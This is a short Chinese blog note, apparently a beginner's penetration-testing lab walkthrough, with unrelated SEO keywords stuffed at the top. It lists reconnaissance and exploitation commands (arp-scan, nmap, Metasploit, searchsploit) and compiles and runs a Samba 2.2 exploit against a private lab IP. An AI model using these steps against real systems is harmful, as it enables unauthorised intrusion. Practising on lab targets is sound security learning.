类似知乎可以做推广的网站,wordpress博客编辑器,nginx wordpress 二级目录,企业互联网推广方式找教程然后自己练习#xff0c;论菜狗的自我修养 基本步骤
1.确定目标IP
2.扫描端口#xff0c;服务#xff0c;版本信息#xff0c;漏洞信息
3.查找漏洞可利用脚本
4.运行脚步 一、信息获取 arp-scan -l nmap -sS -p- -sV -sC -A --min-rate5000 192.168.5.130 二、查…找教程然后自己练习论菜狗的自我修养 基本步骤
1.确定目标IP
2.扫描端口服务版本信息漏洞信息
3.查找漏洞可利用脚本
4.运行脚步 一、信息获取 arp-scan -l nmap -sS -p- -sV -sC -A --min-rate5000 192.168.5.130 二、查找可利用漏洞并攻击
思路a. 139端口Samba服务
由于 -sV 未探测到其版本用 msf 的模块进行探测 msfcomsole use auxiliary/scanner/smb/smb_version show options set RHOSTS 192.168.5.130 run 查找、利用漏洞 searchsploit Samba 2.2 searchsploit -m multiple/remote/10.c gcc 10.c -o k1exp head 10.c -n 50 ./k1exp -b 0 -v 192.168.5.130 思路b. 80端口 apache mode_ssl searchsploit mod_ssl searchsploit -m unix/remote/47080.c head 47080.c -n 50 apt-get install libssl-dev gcc 47080.c -o k11exp -lcrypto 选择一个找到的漏洞叫版本并查看使用fang libssl-dev 可下载
libssl1.0-dev 下载不了
编译出错 可能kali版本太老了。 补充说明
arp-scan -l arp-scan 是一个用于发送 ARP 请求以发现和映射本地网络中的设备的工具. -l 或 --localnet这个选项会让 arp-scan 扫描本地网络即与执行命令的主机在同一子网中的设备 最后会列出本地网络中发现的所有设备包括它们的 MAC 地址、IP 地址和厂商信息。
